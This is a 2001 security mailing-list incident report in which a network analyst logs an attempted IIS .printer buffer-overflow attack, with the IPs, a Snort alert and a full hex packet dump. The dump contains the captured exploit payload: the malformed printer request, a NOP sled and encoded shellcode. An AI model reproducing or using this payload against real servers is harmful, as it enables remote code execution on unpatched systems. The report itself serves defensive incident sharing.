Security Incidents mailing list archives
Attempted WEB-IIS printer attempt Buffer Overflow
From: "Jason Robertson" <jason () ifutureinc com>
Date: Mon, 16 Jul 2001 21:49:51 -0400
Date of Attack: Jul 14, 2001 Time of Attack: 09:00:38 am EDT Source of Attack: IP Address: 198.109.163.170 Destination of Attack: IP Address: 216.18.61.98 Port: 80 Protocol: TCP Description: - Intruder attempted to access the printer isapi filter. Link: http://www.whitehats.com/info/IDS533 Jason Robertson Network Analyst - iFuture Inc. http://www.ifuture.com [**] WEB-IIS printer attempt [**] Jul 14,01 09:00:38am 198.109.163.170:3265 -> 216.18.61.98:80 TTL: 46 TOS: 0x0 ID:1675 ***AP*** Seq: 3550615295 Ack: 2075228853 Win: 32120 474554202F4E554C4C2E7072696E746572204854 GET./NULL.printer.HT 54502F312E300D0A4265617675683A2090909090 TP/1.0..Beavuh:..... 90909090909090909090909090909090EB035DEB ..................]. 05E8F8FFFFFF83C5159090908BC533C966B9D702 ..............3.f... 5080309540E2FA2D959564E214ADD8CF0595E196 P.0.@..-..d......... DD7E607D95959595C81E40147F9A6B6A6A1E4D1E .~`}......@...kjj.M. E6A996661EE3ED96661EEBB5966E1EDB81A678C3 ...f....f....n....x. C2C41EAA966E1E672C9B9595956633E19DCCCA16 .....n.g,....f3..... 5291D07772CCCACB1E581ED3B1965644749654A6 R..wr....X....VDt.T. 5CF31E9D1ED389965654749796541E9596561E67 \.......VTt..T...V.g 1E6B1E452C9E9595957DE1949595A655391055E0 .k.E,....}.....U9.U. 6CC7C36AC241CF1E4D2C939595957DCE94959552 l..j.A..M,....}....R D2F19995959552D2FD9595959552D2F994959595 ......R......R...... FF9518D2F1C518D285C518D281C56AC255FF9518 ..............j.U... D2F1C518D28DC518D289C56AC25552D2B5D19595 ...........j.UR..... 9518D2B5C56AC2511ED2851CD2C91CD2F51ED289 .....j.Q............ 1CD2CD14DAD994949595F352D2C5959518D2E5C5 ...........R........ 18D2B5C5A655C5C5C5FF94C5C57D95959595C814 .....U.......}...... 78D56B6A6AC0C56AC25D6AE2856AC2716AE2896A x.kjj..j.]j..j.qj..j C271FD95919595FFD56AC2451E7DC5FD94949595 .q.......j.E.}...... 6AC27D10559A103F959595A655C5D5C5D5C56AC2 j.}.U..?....U.....j. 79166D6A9A11029595951E4DF352929795F352D2 y.mj.......M.R....R. 9796ED52D291AA8D3EB6FF851892C5C66AC261FF ...R....>.......j.a. A76AC249A65CC4C3C4C4C46AE2816AC2591055E1 .j.I.\.....j..j.Y.U. F50505050515AB95E1BA05050505FF95C3FD9591 .................... 9595C06AE2816AC24D1055E1D505050505FF956A ...j..j.M.U........j A3C0C66AC26D166D6AE1BB050505057E27FF95FD ...j.m.mj......~'... 95919595C0C66AC2691055E98D05050505E109FF ......j.i.U......... 95C3C5C06AE28D6AC241FFA76AC2497E1FC66AC2 ....j..j.A..j.I~..j. 65FF956AC275A655391055E06CC4C7C3C66A47CF e..j.u.U9.U.l....jG. CC3E777B56D2F0E1C5E7FAF6D4F1F1E7F0E6E695 .>w{V............... D9FAF4F1D9FCF7E7F4E7ECD495D6E7F0F4E1F0C5 .................... FCE5F095D2F0E1C6E1F4E7E1E0E5DCFBF3FAD495 .................... D6E7F0F4E1F0C5E7FAF6F0E6E6D495C5F0F0FEDB .................... F4F8F0F1C5FCE5F095D2F9FAF7F4F9D4F9F9FAF6 .................... 95C2E7FCE1F0D3FCF9F095C7F0F4F1D3FCF9F095 .................... C6F9F0F0E595D0EDFCE1C5E7FAF6F0E6E695D6F9 .................... FAE6F0DDF4FBF1F9F095C2C6DAD6DEA6A795C2C6 .................... D4C6E1F4E7E1E0E595E6FAF6FEF0E195F6F9FAE6 .................... F0E6FAF6FEF0E195F6FAFBFBF0F6E195E6F0FBF1 .................... 95E7F0F6E395F6F8F1BBF0EDF0950D0A486F7374 ................Host 3A20909090909090909090909090909090909090 :................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 9090909090909090909090909090909090909090 .................... 909090909090909090909033C0B09003D88B038B ...........3........ 406033DBB32403C3FFE0EBB9909005318C6A0D0A @`3..$.........1.j.. 0D0A .. --- Jason Robertson Network Analyst jason () ifutureinc com http://www.astroadvice.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Attempted WEB-IIS printer attempt Buffer Overflow Jason Robertson (Jul 17)
- Re: Attempted WEB-IIS printer attempt Buffer Overflow Doug Nelson (Jul 17)